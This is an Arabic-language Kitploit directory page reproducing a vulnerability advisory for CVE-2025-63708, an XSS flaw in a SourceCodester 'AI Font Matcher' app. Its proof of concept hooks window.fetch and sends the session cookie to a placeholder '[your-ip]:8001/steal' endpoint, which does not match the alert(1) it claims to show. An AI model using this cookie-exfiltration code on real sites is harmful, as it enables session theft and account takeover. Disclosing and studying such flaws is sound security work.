Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/dylandavis1/cve-2025-63708
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-63708

معرّف CVE: CVE-2025-63708
تاريخ الإسناد: 11-12-2025 نوع المشكلة: CWE-79 (Cross-Site Scripting)
المنتج المتأثر: “AI Font Matcher” (نُشر في 2025-10-10، nid=18425)
صفحة المنتج: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
تاريخ الاكتشاف: 2025-10-11
الباحث: Dylan Davis

الملخص

يعالج التطبيق البيانات القادمة من طلب webfonts دون تعقيم أسماء عائلات الخطوط. يمكن للمهاجم الذي يتحكم في هذه الاستجابة أو يعترضها حقن JavaScript يتم تنفيذها في سياق الصفحة، مما يتيح سرقة ملفات تعريف الارتباط الخاصة بالجلسة والاستيلاء على الحساب.

التأثير

  • تنفيذ JavaScript تعسفي في متصفح الضحية
  • استخراج ملفات تعريف ارتباط الجلسة (لاحظت ملفات تعريف ارتباط غير HttpOnly أثناء اختباري)
  • اختطاف الحساب وتنفيذ إجراءات نيابةً عن المستخدم

الإصدارات المتأثرة / النطاق

  • حزمة “AI Font Matcher” الموزّعة على SourceCodester اعتبارًا من 2025-10-10.

إعادة الإنتاج (PoC)

يوضح هذا الـ PoC تنفيذ التعليمات البرمجية عن طريق اعتراض window.fetch وإرجاع حمولة Web Fonts خاضعة للتحكم.

  1. شغّل التطبيق محليًا من المصدر الذي تم تنزيله.
  2. افتح DevTools → Console والصق الـ PoC أدناه (أو حمّل poc.js).
  3. أطلق واجهة المستخدم التي تجلب webfonts؛ ولاحظ ظهور alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
تنزيل الأداة